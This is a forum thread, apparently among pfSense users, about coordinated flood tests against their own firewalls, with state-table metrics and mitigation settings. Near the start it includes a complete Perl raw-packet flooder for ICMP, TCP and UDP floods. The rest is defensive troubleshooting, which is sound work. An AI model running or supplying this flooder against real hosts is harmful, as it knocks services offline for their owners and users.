What is the biggest attack in Gbps you have stopped?
-
Interesting!
-
@Supermule, I don't see a PM, so I'm guessing you don't want to share the script in a bid to potentially solve the problem. Correct?
-
We are conducting some testing now with interesting results. Will post more when we're done.
-
#!/usr/bin/perl -w
# =================================================
# simple network flooder script
# takes type of flood (icmp, tcp, udp) as param
# optionally takes dest ip and packet count
# =================================================
my $VERSION = 0.5;
# =================================================
use strict;
use Net::RawIP;

my $flood = shift or usage();
my $dstip = shift || '127.0.0.1';
my $pktct = shift || 100;

icmpflood($dstip, $pktct) if $flood =~ /icmp/;
tcpflood($dstip, $pktct)  if $flood =~ /tcp/;
udpflood($dstip, $pktct)  if $flood =~ /udp/;

sub icmpflood {
    my ($dstip, $pktct) = @_;
    print "\nstarting flood to $dstip\n";
    for (my $i = 0; $i <= $pktct; $i++) {
        # randomise ICMP type/code and the fragment offset for every packet
        my $code = int(rand(255));
        my $type = int(rand(255));
        my $frag = int(rand(2));
        my $packet = new Net::RawIP({
            ip => {
                daddr    => $dstip,
                frag_off => $frag,
            },
            icmp => {
                code => $code,
                type => $type,
            }
        });
        $packet->send;
        print "sent icmp $type->$code, frag: $frag\n";
    }
    print "\nflood complete\n\n";
}

sub tcpflood {
    my ($dstip, $pktct) = @_;
    print "\nstarting flood to $dstip\n";
    for (my $i = 0; $i <= $pktct; $i++) {
        # random ports, fragment offset and TCP flag combination
        my $sport = int(rand(65535));
        my $dport = int(rand(65535));
        my $frag  = int(rand(2));
        my $urg   = int(rand(2));
        my $psh   = int(rand(2));
        my $rst   = int(rand(2));
        my $fin   = int(rand(2));
        my $syn   = int(rand(2));
        my $ack   = int(rand(2));
        my $packet = new Net::RawIP({
            ip => {
                daddr    => $dstip,
                frag_off => $frag,
            },
            tcp => {
                source => $sport,
                dest   => $dport,
                urg    => $urg,
                psh    => $psh,
                rst    => $rst,
                fin    => $fin,
                syn    => $syn,
                ack    => $ack,
            }
        });
        $packet->send;
        print "sent tcp packet from $sport to $dport, frag: $frag, "
            . "psh: $psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";
    }
    print "\nflood complete\n\n";
}

sub udpflood {
    my ($dstip, $pktct) = @_;
    print "\nstarting flood to $dstip\n";
    for (my $i = 0; $i <= $pktct; $i++) {
        # random low ports and fragment offset
        my $sport = int(rand(255));
        my $dport = int(rand(255));
        my $frag  = int(rand(2));
        my $packet = new Net::RawIP({
            ip => {
                daddr    => $dstip,
                frag_off => $frag,
            },
            udp => {
                source => $sport,
                dest   => $dport,
            }
        });
        $packet->send;
        print "sent udp packet from $sport to $dport, frag: $frag\n";
    }
    print "\nflood complete\n\n";
}

sub usage {
    print "
need to set a valid flood type (one of icmp, tcp, udp)
optionally set dest ip and packet count

example:
$0 [icmp|tcp|udp] [dest ip] [packet count]\n\n";
    exit 0;
}
-
Here is some data from the attack that Supermule, almabes, and I coordinated today.
The initial SYN flood attack disabled my WAN2 interface and brought my pfSense box to a crawl. However, I had the console running and saw this:
This was easy to fix by increasing the amount of states. My pfSense installation is set to the default limit of 394000, so I first increased it to 4,000,000 and then to 8,000,000. After doing that, the pfSense box responded fine. I have 4 NICs in the box—WAN1, WAN2, LAN1, and LAN2. The attack was on WAN2, and all other interfaces and pfSense worked perfectly normal while WAN2 went down hard.
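For anyone who wants to check or raise the same limit, this is roughly what it looks like from the shell (the 8,000,000 figure is just what I used; each state entry costs memory, so size it to your RAM):

pfctl -sm | grep states                  # current hard limit for states
pfctl -si | grep -i "current entries"    # how many states are in use right now

The GUI equivalent is System > Advanced > Firewall & NAT > Firewall Maximum States, which ends up in the ruleset as a directive along the lines of "set limit states 8000000".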
Here is part of the Skype transcript with some real-time metrics:
[5/23/15, 5:03:12 PM] Tim McManus: Ok
[5/23/15, 5:03:25 PM] Tim McManus: UI is good.
[5/23/15, 5:03:37 PM] Tim McManus: Wan1 good.
[5/23/15, 5:03:53 PM] Tim McManus: 4mbit attack.
[5/23/15, 5:04:21 PM] Tim McManus: 3M states.
[5/23/15, 5:04:43 PM] Tim McManus: 3.2M states.
[5/23/15, 5:05:07 PM] Tim McManus: Wan2 dead.
[5/23/15, 5:05:15 PM] Tim McManus: Wan1 fine.
[5/23/15, 5:06:42 PM] Tim McManus: Wan2 is crushed. 700ms Rtt ping. Normally 30ms tops.
[5/23/15, 5:06:58 PM] Tim McManus: But the box is running fine.
[5/23/15, 5:07:06 PM] Tim McManus: 4M states.
[5/23/15, 5:07:22 PM] Tim McManus: UI is fine.
[5/23/15, 5:07:48 PM] Tim McManus: UI is real fast.
[5/23/15, 5:08:03 PM] Tim McManus: Just bumped states to 8M.
[5/23/15, 5:08:22 PM] Tim McManus: Ping is now 13 ms.
[5/23/15, 5:08:36 PM] Tim McManus: 115 me it incoming wan2.
[5/23/15, 5:08:41 PM] Tim McManus: Mbit
[5/23/15, 5:09:18 PM] Tim McManus: Wan2 is slower but working fine.
[5/23/15, 5:10:26 PM] Tim McManus: 4.7M states.
[5/23/15, 5:10:39 PM] Tim McManus: Rtt is 160ms.
[5/23/15, 5:10:53 PM] Tim McManus: Wan2 down.
[5/23/15, 5:11:04 PM] Tim McManus: Back
[5/23/15, 5:11:09 PM] Tim McManus: Rtt 900 ms.
[5/23/15, 5:11:28 PM] Tim McManus: 4.8M states.
[5/23/15, 5:11:56 PM] Tim McManus: 4mbit incoming.
[5/23/15, 5:12:33 PM] Tim McManus: High latency alert on the UI.
[5/23/15, 5:13:13 PM] Tim McManus: Wan2 down. Wan1 fine.
[5/23/15, 5:14:28 PM] Tim McManus: UI has been fine since I increased the state table.
The console looked like this through the attack:
Although the Web UI was crippled, the console worked fine. However, the initial attack took out all of the graphing, and the historical RRD graphs look affected as well: the graphing services did not come back online on their own, and the box was only rebooted a couple of hours after the attack, so the graphs show a gap from when the attack started until after that reboot.
I have additional data and metrics from my OpenNMS monitoring box, as well as all of my graphs and system logs. The development team is more than welcome to PM me for them, but at this point I'm not going to share them publicly. It seems the attack saturates the pf state table and significantly impairs the box, but increasing the number of states allows the box to stay up even while the interface is taken down.
We will probably do some additional testing, but this is my quick summary of what we discovered.
It is important to note that I have 4 x 1Gb NICs, an i3, and 4GB of RAM. I can list all of the details of this box and the topology in another post if anyone is interested. We were also running Wireshark during the test, and I have some, but not all, packet captures from that. That was a useful tool to see when an interface was being attacked and by what method.
-
Can someone give a proper summary of what the problem actually is so others don't have to wade through 20+ pages to find the info?
Specifically: Is the traffic in question actually passed, or blocked? Is a service on the firewall running pfSense (such as the GUI) exposed to the test source or is the traffic being passed through to an internal host (port forward, routed, etc)? – This is important because a SYN flood to pfSense as a host is completely different than a flood through pfSense as a forwarder/firewall.
If the traffic is passing through the firewall, using rules to clamp down state limits, or going stateless properly (floating quick OUT rules to pass out with no state along with the pass in rules on the other tabs) may help.
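As a rough pf-level sketch of both options (the interface and alias names are placeholders and the numbers are only examples; in pfSense these map to the per-rule advanced options and to floating rules):

table <abusers> persist

# clamp state creation on the pass-in rule
pass in on $wan_if proto tcp to $web_srv port { 80 443 } flags S/SA keep state \
    (max 100000, max-src-conn 100, max-src-conn-rate 15/5, overload <abusers> flush global)

# or go stateless for this traffic: floating quick out rule with no state,
# paired with a no-state pass-in rule on the interface tab
pass in  quick on $wan_if proto tcp to $web_srv port { 80 443 } flags any no state
pass out quick on $wan_if proto tcp from $web_srv port { 80 443 } flags any no state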
If the traffic is targeting the firewall itself, then there are things that can be tweaked (syncache parameters, for example), but it's yet another reason the services on the firewall such as the GUI and SSH should not be exposed to the Internet in general. State limits can help there as well.
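For the attack-on-the-firewall case, the FreeBSD knobs in question look roughly like this (values are illustrative only; the syncache sizes are boot-time tunables, so on pfSense they belong in /boot/loader.conf.local, while syncookies can be toggled at runtime or via System Tunables):

# runtime: keep syncookies on so a full syncache doesn't block
# legitimate connections to the firewall itself
sysctl net.inet.tcp.syncookies=1

# boot-time (loader.conf.local): enlarge the syncache
net.inet.tcp.syncache.hashsize="2048"
net.inet.tcp.syncache.bucketlimit="100"
net.inet.tcp.syncache.cachelimit="65536"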
Also the "size" of an attack in Mbit/s or Gbit/s is not as important to know as the PPS rate which tends to be the limiting factor when dealing with small packets such as this.
Some answers to your questions based on today's testing:
Is the traffic in question actually passed, or blocked? Both. Most of it was blocked: there were several different kinds of attacks, and the SYN flood was among those blocked.
Is a service on the firewall running pfSense (such as the GUI) exposed to the test source or is the traffic being passed through to an internal host (port forward, routed, etc)? Traffic was focused on the external IP to ports 80 and 443. No services were exposed on either WAN interface. The external IP of WAN2 forwarded ports 80 and 443 to an internal address running a web server.
This is important because a SYN flood to pfSense as a host is completely different than a flood through pfSense as a forwarder/firewall. I believe, but cannot be certain, that when my WAN1 interface was attacked with the same SYN flood we had the same issue. WAN1 does not forward any ports. I didn't have Wireshark running at this time on that interface, but we can always retest.
-
I don't know if they were the same tests, but my i5 3.2 GHz with an i350-T2 NIC took tens of megabits. I didn't think to have my console on, so I don't know if there was an interrupt storm. The i350 seems to be really good at keeping interrupts low; I don't know how, but during normal usage the interrupt rate is pretty much identical between load and idle. I'm not sure how it behaves under the attack, though.
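For what it's worth, FreeBSD does expose per-device interrupt totals and rates, so something like this should show whether there is an interrupt storm next time (igb is the driver the i350 uses):

vmstat -i | grep igb    # interrupt count and rate per queue vector
systat -vmstat 1        # live system view including interrupt rates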
-
I specifically wanted to run top during the attack to determine if the issue was load or a specific process. CPU never hit 50%. I was hit with 118 Mbit attacks, and the other three interfaces were fine, as was the pfSense box itself.
But I strongly recommend running the console during a test attack.
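For reference, a few console commands that cover load, state usage and per-interface packet rates during an attack (igb1 is just an example NIC name):

top -aSH                        # per-thread view, including kernel and interrupt threads
pfctl -si | grep -i entries     # current state table usage
netstat -w 1 -I igb1            # per-second packet and error counters on the attacked NIC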
-
So it looks like an i5 handles it better than an i3, but I don't know if the i5 also has the same amount of RAM or not?
It's generally useful to post the hardware specs, perhaps in the sig; I've found this sort of thing useful for debugging problems in programming languages.
I'll be trying this later today in a couple of VMs (virtual PCs running on VMware), since I can control the number of cores, network speed and other tweaks, not to mention set up many, many NICs. With 32 GB on my dev machine I can give the virtual pfSense more RAM and more cores to see whether that, or other hardware like spinning disks or SSDs, becomes a factor.
Did anyone get anywhere with the SYN flooding and dtrace links I PM'ed to almabes?
-
Tim is running pfSense on bare metal. Almabes is running in a VM.
We have tested the two scenarios before, and both were taken offline.
Almabes's modem died during the test and didn't come back online unless he manually rebooted it. He runs Cisco.
I run dual Xeons:
http://ark.intel.com/products/33927/Intel-Xeon-Processor-E5420-12M-Cache-2_50-GHz-1333-MHz-FSB
A little note here that could contain a clue.
When I disabled services as per the picture, the box recovered really quickly in the VM.
The overall load was lower, as expected, but after the CPU spiked during the attack, the recovery period was significantly shorter without the services running.
-
Somewhat interesting findings this morning…
I turned the apinger daemon on again as the only service, and the box died on me completely when attacked.
Recovery time was very long, with 2-3 minutes of extra downtime before the box was responding again.
-
Turned off apinger and turned on cron.
The GUI was much more responsive, and the traffic graphs didn't die on me completely this time.
Recovered instantly after the attack was stopped.
-
When enabling NTP, the box's responsiveness became worse.
It was not updating the graphs as quickly, and recovery time was a little worse, as seen in the little bend in the right-hand corner of the last CPU graph from VMware. Recovery took 15-20 seconds longer.
-
Enabled Snort to see if it made things worse.
The answer to that is yes and no… the initial phase was really good, since it took out the initial spike in CPU and made the load more even (a slower ramp-up). The CPU had a shorter max-load interval than in previous attacks.
It spread the CPU usage more evenly across the 8 cores, and recovery was really good.
The traffic graphs didn't fare as well as with only cron running.
-
When Snort AND cron were enabled, the graphs looked like this…
Total load was higher and recovery was fine, but the initial CPU offloading was not there anymore.
-
Enabling apinger did not do the box any good, as expected.
More CPU on top and a minute longer to recover. For what it's worth, the impact didn't seem as big as in the first test, but the trend is still there (and it is big).
The traffic graphs were as unresponsive as the rest of the GUI; they die on the first CPU spike.
-
So maybe some services are more resource hungry and/or less refined in the scheme of things.
I wonder if there would be any benefit in having two firewalls in series, where the forward-facing first one is stripped of all unnecessary tasks/services and the second inline firewall runs those services/tasks instead?
It certainly seems like there might not be any one property, service or task at fault, but rather a combination of things that affects how well the system stays up.
Have you seen the links I PM'ed almabes regarding setting up pfSense to reduce/avoid SYN floods? If so, did you give them a go, and how did they perform?
-
I did not see the links.
States are at about 1% on the box, and it has limits on how many states can be created per rule.
I'm running synproxy state with an allowance of 50 new connections per second.
That gives the state table some "air", but it doesn't help much.
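In raw pf terms the rule is roughly along these lines (a sketch; the interface and alias names are placeholders, 50/1 is the per-source rate I mentioned, and <virusprot> is the overload table pfSense uses for these limits):

pass in on $wan_if proto tcp from any to $web_srv port { 80 443 } flags S/SA \
    synproxy state (max 500000, max-src-conn-rate 50/1, overload <virusprot> flush global)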
-
I have come a BIG step closer to locating the culprit.
Look at the graphs when NTPD is enabled.
It destroys the GUI completely and takes the interfaces offline in the GUI; there is no response from them. The graphs cover a 3-minute attack, and only maybe 10 seconds of it are showing.
What's really interesting is the VMware graph. When it spikes for the last time, the GUI comes back and the CPU graph in the GUI starts working again.
I wonder if NTPD and apinger together could be compounding the problem?
-
Deleted the VMware Tools package and tested again.
The box did a little better this time with NTPD and apinger running.
The little spike before the last one is a reboot. Recovery took about a minute longer than usual.